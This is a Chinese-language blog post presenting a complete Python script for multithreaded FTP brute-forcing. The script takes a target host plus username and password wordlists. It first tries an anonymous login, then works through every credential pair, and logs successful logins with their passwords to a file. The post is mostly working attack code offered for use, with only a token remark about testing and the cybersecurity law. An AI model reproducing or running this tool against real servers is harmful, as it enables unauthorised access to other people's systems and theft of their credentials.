A-A+
python FTP多线程暴力破解工具 最新优化版
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
就不对外公开了,毕竟新的网络安全法已经上了,你懂的。自己用作测试的。花了近2个小时弄的。特别完善多线程这块。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import optparse
import ftplib, socket
import queue
import sys, os, time, re
def brute_anony(host):
try:
print('[+] 测试匿名登陆……\n')
ftp = ftplib.FTP()
ftp.connect(host, 21, timeout=10)
print('FTP消息: %s \n' % ftp.getwelcome())
ftp.login()
ftp.retrlines('LIST')
ftp.quit()
f = open('successful.txt', 'a')
f.write(str('successful---Host:%s\n' % (host)))
f.close()
print('\n[+] 匿名登陆成功……\n')
except ftplib.all_errors:
print('\n[-] 匿名登陆失败……\n')
class bcolors:
OKBLUE = '\033[94m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def logo():
print(''' |---------------------------------------------------------------|
| |
| QQ: 123456 blog: https://woj.app |
| 2019-04-26 ftpbaopo.py |
| FTP Brute Forcing Tool |
| |
|---------------------------------------------------------------|
''')
class FtpBurp(threading.Thread):
"""docstring for ftp"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
if self.queue.empty():
break
user, pwd, host = self.queue.get()
try:
ftp = ftplib.FTP()
ftp.connect(host, 21, timeout=10)
ftp.login(user, pwd)
ftp.quit()
ftxt = open('successful.txt', 'a')
ftxt.write(str('successful---Host:%s --use)rname:%s --password:%s\n' % (host, user, pwd)))
ftxt.close()
print(bcolors.OKBLUE + '[!]successful---username:%s --password:%s' % (user, pwd))
except ftplib.all_errors:
print(bcolors.FAIL + '[*]' + user + '----' + pwd + '')
self.queue.task_done()
if __name__ == '__main__':
logo()
parser = optparse.OptionParser(usage='%prog -H -u -p -T')
parser.add_option('-H', '--host', dest='host', type='string',
help='specify target host= xxx.xxx.xxx.xx or www.xxx.com')
parser.add_option('-u', '--userfile', dest='userfile', type='string', help='specify username\'filepath')
parser.add_option('-p', '--passwordfile', dest='passfile', type='string', help='specify password\'filepath')
parser.add_option('-T', '--thread', dest='threadnum', type='int', help='specity the number of thread -- default(6)')
(options, args) = parser.parse_args()
start_time = time.time()
if options.threadnum:
n = int(options.threadnum)
else:
n = 6
host = options.host
if options.host == None:
parser.print_help()
sys.exit(0)
####userlist = [i.rstrip() for i in open(options.userfile)]
if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', options.host):
host = options.host
else:
if options.host.find('/') >= 0:
host = options.host.replace("http://", "")
host = host.replace("https://", "")
hostt = host.find(r'/')
if hostt >= 0: host = host[:hostt]
host = socket.gethostbyname(host)
userlist = [i.strip() for i in open(options.userfile)]
passlist = [j.strip() for j in open(options.passfile)]
print('目 标:%s ' % host)
print('用户名:%d 条' % len(userlist))
print('密 码:%d 条' % len(passlist))
print('线 程:%d 条' % n)
brute_anony(host)
print('\n[+] 暴力破解测试中……\n')
threads = []
queue = queue.Queue()
lock = threading.Lock()
####num=threading.Semaphore(n)
for user in userlist:
for pwd in passlist:
remodle = re.compile(r'%username%')
if remodle.findall(pwd):
pwd = pwd.replace("%username%", user)
queue.put((user, pwd, host))
for i in range(n):
m_ftp = FtpBurp(queue)
m_ftp.setDaemon(True)
####threads.append(m_ftp)
m_ftp.start()
# for m_ftp in threads:
# m_ftp.join()
queue.join()
print('所有执行完毕') |
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏